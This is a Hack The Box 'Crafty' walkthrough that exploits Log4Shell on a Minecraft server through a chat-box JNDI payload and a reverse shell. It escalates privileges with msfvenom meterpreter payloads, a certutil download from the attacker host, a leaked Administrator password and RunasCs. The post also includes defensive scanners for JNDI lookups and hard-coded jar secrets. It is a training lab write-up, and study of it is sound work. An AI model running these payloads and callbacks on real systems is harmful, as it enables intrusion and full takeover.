Hack The Box - Crafty

05 May 2024 . tech
#tutorial

Reconnaissance and Initial Steps

Nmap Results

nmap 10.10.11.249 -p-

image

sudo nmap -p80,25565 -sV -sC 10.10.11.249

image

I add crafty.htb to /etc/hosts with the given IP address, then navigate to http://crafty.htb

echo "10.10.11.249 crafty.htb" | sudo tee -a /etc/hosts

When I visited crafty.htb, I found a Minecraft introduction page.

image

Foothold

However, for port 25565 I recall there being a log4j vulnerability, CVE-2021-44228 to be precise. An attacker who controls log messages or log message parameters can make log4j perform a JNDI lookup and execute arbitrary code. An exploit for this vulnerability can be found here:

git clone https://github.com/kozmer/log4j-shell-poc

image

Modify the String cmd variable to ensure compatibility with Windows.

image

In order for poc.py to run smoothly we need a Java 8 JDK extracted into a directory named jdk1.8.0_20. I found a suitable archive here:

wget https://repo.huaweicloud.com/java/jdk/8u181-b13/jdk-8u181-linux-x64.tar.gz
tar -xf jdk-8u181-linux-x64.tar.gz
mv jdk1.8.0_181 jdk1.8.0_20

image

To connect to the server, I needed a Minecraft client on my Kali system. After some research I downloaded TLauncher from https://tlauncher.org/en/download_1/minecraft-1-16-5_12582.html (I don't recommend using it, but I proceeded anyway since I was installing it in a VM), and I chose Minecraft 1.16.5 Java Edition because I knew it was vulnerable to log4j.

Once you have downloaded TLauncher.zip, unzip it and start it with the command below:

sudo java -jar TLauncher.jar

image

image

After that, select the correct release version, fill in a Minecraft account name, and click Enter the game.

image

Clicking on Multiplayer allowed me to enter the server.

image

10.10.11.249:25565

image

I had to attempt logging in to the server multiple times, and each time I had to reset the box for it to function properly. Once logged in to the server, I opened a terminal and ran the PoC. It prints a payload string (${jndi:ldap://10.10.16.18:1389/a}), which I copied.

python3 poc.py --userip <tun0 IP> --webport 80 --lport 4444

In another terminal, start a netcat listener on port 4444:

nc -nlvp 4444

Then, in Minecraft, I pressed T (to send a chat message), pasted the copied string (${jndi:ldap://10.10.16.18:1389/a}) into the chat box, and within a few seconds I had a reverse shell on my netcat listener.
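The chat message above only works because the server hands the player's text to log4j, which evaluates ${...} lookups while formatting the log line. From the defender's side the same log line is the detection opportunity. The following is an added example, not part of the original writeup or of the PoC repository: it scans constructed Minecraft-style server log lines for JNDI lookups, first statically collapsing the nesting tricks (${lower:...}, ${upper:...} and the ${...:-x} default-value syntax) that are commonly used to split the word "jndi" so a naive substring search misses it. The log lines, IPs and player names are constructed for the example.

```python
import re

# Constructed Minecraft-server-style log lines (not taken from the box). The chat
# text on each line is what log4j formats, and therefore where a lookup would fire.
SAMPLE_LOG = """\
[12:01:02] [Server thread/INFO]: <steve> hello everyone
[12:01:09] [Server thread/INFO]: <alex> ${jndi:ldap://10.10.16.18:1389/a}
[12:01:15] [Server thread/INFO]: <alex> ${${lower:j}ndi:rmi://203.0.113.5:1099/x}
[12:01:20] [Server thread/INFO]: <alex> ${${::-j}${::-n}${::-d}${::-i}:dns://203.0.113.5/q}
[12:01:33] [Server thread/INFO]: <steve> the price is ${10} or so
"""

# An innermost ${...} lookup: a body containing no further '$', '{' or '}'.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")

# The form we alert on once normalized: a jndi lookup with a JNDI provider scheme.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\s*:", re.I)


def _resolve(body):
    """Statically evaluate lookups that need no runtime context.

    Handles ${lower:X}, ${upper:X} and the default-value syntax ${anything:-X}
    (which covers ${::-X}). Anything else is returned as None and left untouched,
    so the normalizer never guesses at environment- or system-dependent values.
    """
    lowered = body.lower()
    if lowered.startswith("lower:"):
        return body[6:].lower()
    if lowered.startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:
        return body.split(":-", 1)[1]
    return None


def normalize(text, max_rounds=16):
    """Collapse nested lookups from the inside out until nothing more resolves."""
    for _ in range(max_rounds):
        changed = False

        def sub(match):
            nonlocal changed
            resolved = _resolve(match.group(1))
            if resolved is None:
                return match.group(0)
            changed = True
            return resolved

        text = INNER_LOOKUP.sub(sub, text)
        if not changed:
            break
    return text


def find_log4shell_attempts(log_text):
    """Return (line_number, scheme, normalized_line) for each line carrying a JNDI lookup."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        norm = normalize(line)
        match = JNDI_LOOKUP.search(norm)
        if match:
            hits.append((lineno, match.group(1).lower(), norm.strip()))
    return hits


if __name__ == "__main__":
    for lineno, scheme, line in find_log4shell_attempts(SAMPLE_LOG):
        print(f"line {lineno}: jndi:{scheme} lookup -> {line}")
```

Running it flags lines 2, 3 and 4 (ldap, rmi and dns lookups) and ignores the harmless ${10} on line 5. Detection is a backstop only; the fix for a server like this one is to run a log4j release that no longer resolves JNDI lookups in messages (2.17.1 or later), or on 2.10 and newer to start the JVM with -Dlog4j2.formatMsgNoLookups=true while an upgrade is arranged.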

image

image

In the screenshot below you can see the whole process:

image

user.txt

Now we can read user.txt:

image

Privilege Escalation

While exploring the machine, I stumbled upon an interesting .jar file located in C:\Users\svc_minecraft\server\plugins.

image

With my current shell I couldn't download the file, so I followed the steps below:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.18 LPORT=4244 -f exe -o exploit.exe

image

I then fired up Metasploit and did the following:

sudo msfconsole -q
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.10.16.18
set lport 4244
run

image

Then spin up a Python HTTP server in a separate tab to serve exploit.exe:

python3 -m http.server 4245

Then run the command below in the foothold shell. It fetches the msfvenom-generated exploit.exe and writes it to the target's temp directory:

certutil -urlcache -f http://10.10.16.18:4245/exploit.exe %temp%/exploit.exe

image

Then run exploit.exe:

start %temp%/exploit.exe

image

BOOM! We got a stable shell through Meterpreter, so now we can download the .jar file.

image

To find out what is in this file we need a Java decompiler. jd-gui is available in Kali and installed with the command below. Running it opens the decompiler; click File in the top right, then Open File, find the .jar file and open it.

sudo apt install jd-gui

image

image

By opening this file with JD-GUI, I found a credential in the Playercounter.class.
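Opening a plugin in JD-GUI and reading through the classes is the manual version of a check a server admin or plugin author can automate before deploying third-party jars. The following is an added example, not part of the original writeup or of any plugin's code: it walks the .class entries of a jar, parses each class file's constant pool directly (no decompiler needed), pulls out the string literals (CONSTANT_String entries pointing at CONSTANT_Utf8 text) and flags literals that look like passwords plus identifiers named like credential holders. The jar it scans is constructed in memory for the example; the class name echoes the one found on the box, but the credential literal in it is made up.

```python
import io
import re
import struct
import zipfile

# Utf8 entries (field/method names) whose text suggests they hold a credential.
SECRET_NAME = re.compile(r"pass(word|wd)?|secret|token|api[_-]?key|credential", re.I)


def parse_constant_pool(data):
    """Parse a .class file's constant pool into a list indexed the way the JVM does.

    Only CONSTANT_Utf8 (tag 1) and CONSTANT_String (tag 8) are kept; other tags are
    skipped by their fixed sizes. Long and Double occupy two pool slots (JVMS 4.4.5).
    """
    if data[:4] != b"\xca\xfe\xba\xbe":
        raise ValueError("not a class file")
    (count,) = struct.unpack(">H", data[8:10])
    pool = [None] * count          # slot 0 is unused by design
    off, i = 10, 1
    while i < count:
        tag = data[off]
        off += 1
        if tag == 1:                                   # Utf8: u2 length + bytes
            (length,) = struct.unpack(">H", data[off:off + 2])
            off += 2
            pool[i] = ("Utf8", data[off:off + length].decode("utf-8", "replace"))
            off += length
        elif tag == 8:                                 # String: u2 index of the Utf8
            pool[i] = ("String", struct.unpack(">H", data[off:off + 2])[0])
            off += 2
        elif tag in (7, 16, 19, 20):                   # Class, MethodType, Module, Package
            off += 2
        elif tag in (3, 4, 9, 10, 11, 12, 17, 18):     # Integer, Float, refs, NameAndType, (Invoke)Dynamic
            off += 4
        elif tag in (5, 6):                            # Long, Double: 8 bytes and two slots
            off += 8
            i += 1
        elif tag == 15:                                # MethodHandle: u1 kind + u2 index
            off += 3
        else:
            raise ValueError(f"unknown constant pool tag {tag}")
        i += 1
    return pool


def looks_like_secret(value):
    """Heuristic (constructed for this example) for a hard-coded password literal:
    8+ chars, no whitespace, letters and digits mixed, and none of '/', '.' or ':'
    so URLs, paths and class names are not reported."""
    return (len(value) >= 8 and re.search(r"\s", value) is None
            and re.search(r"[A-Za-z]", value) is not None
            and re.search(r"\d", value) is not None
            and re.search(r"[/.:]", value) is None)


def scan_class(data):
    """Return (kind, text) findings for one class: suspicious literals and identifiers."""
    pool = parse_constant_pool(data)
    literal_idx = {e[1] for e in pool if e and e[0] == "String"}
    findings = []
    for idx in sorted(literal_idx):
        if pool[idx] and pool[idx][0] == "Utf8" and looks_like_secret(pool[idx][1]):
            findings.append(("literal", pool[idx][1]))
    for idx, entry in enumerate(pool):
        if entry and entry[0] == "Utf8" and idx not in literal_idx and SECRET_NAME.search(entry[1]):
            findings.append(("identifier", entry[1]))
    return findings


def scan_jar(jar_bytes):
    """Walk every .class entry of a jar (a zip) and collect (entry, kind, text) findings."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        for name in zf.namelist():
            if name.endswith(".class"):
                findings.extend((name, kind, text) for kind, text in scan_class(zf.read(name)))
    return findings


def _build_class(literals, names):
    """Constructed minimal class file: Utf8 entries for the literals and identifiers,
    CONSTANT_String entries pointing at the literals, and a zeroed remainder (no
    fields or methods), which is all the scanner reads."""
    pool = [b"\x01" + struct.pack(">H", len(s.encode())) + s.encode() for s in literals + names]
    pool += [b"\x08" + struct.pack(">H", i + 1) for i in range(len(literals))]
    header = b"\xca\xfe\xba\xbe" + struct.pack(">HHH", 0, 52, len(pool) + 1)
    return header + b"".join(pool) + b"\x00" * 14


def build_sample_jar():
    """Constructed plugin jar standing in for the one on the box (not the real file)."""
    cls = _build_class(
        literals=["Hello, world", "jdbc:mysql://localhost/mc", "Tr0ub4dor-3xyz"],
        names=["playercounter/Playercounter", "password", "java/lang/Object", "onEnable"])
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr("playercounter/Playercounter.class", cls)
    return buf.getvalue()


if __name__ == "__main__":
    for entry, kind, text in scan_jar(build_sample_jar()):
        print(f"{entry}: {kind} {text!r}")
```

Point scan_jar at the bytes of a real plugin and it reports the literal that would have shown up in JD-GUI together with the field named password that holds it. The heuristic is deliberately crude and will miss passwords containing dots or colons; the reliable fix is on the plugin side, reading credentials from the server's config or environment rather than compiling them into the class.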

Now we are going to use RunasCs, which allows us to run processes with different permissions than the ones we currently have. The goal is to start an Administrator shell from our current user svc_minecraft.

https://github.com/antonioCoco/RunasCs/releases

Download the version 1.5 RunasCs.zip from the link above and unzip it. We are going to be using RunasCs.exe for this box.

Now create another msfvenom payload, this time for port 4246:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.18 LPORT=4246 -f exe -o exploit2.exe

image

In the Meterpreter session you can try uploading to \server\plugins, but it won't work because of permissions. We need to move over to \server\logs, where we can upload the new payload exploit2.exe and RunasCs.exe.

image

Open a new tab and launch Metasploit. Repeat the listener setup from the previous Metasploit section, this time on port 4246:

sudo msfconsole -q
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.10.16.18
set lport 4246
run

image

Returning to our previous Meterpreter shell, execute the following command:

.\RunasCs.exe Administrator s67u84zKq8IXw exploit2.exe

image

BOOM!! We got the Administrator shell, and with it the root flag!

image


Me

c0d3cr4f73r is a cybersecurity enthusiast with a passion for red teaming and malware analysis. Based in Dubai, c0d3cr4f73r has extensive experience in offensive security operations. In their free time, they enjoy diving into the latest cybersecurity challenges.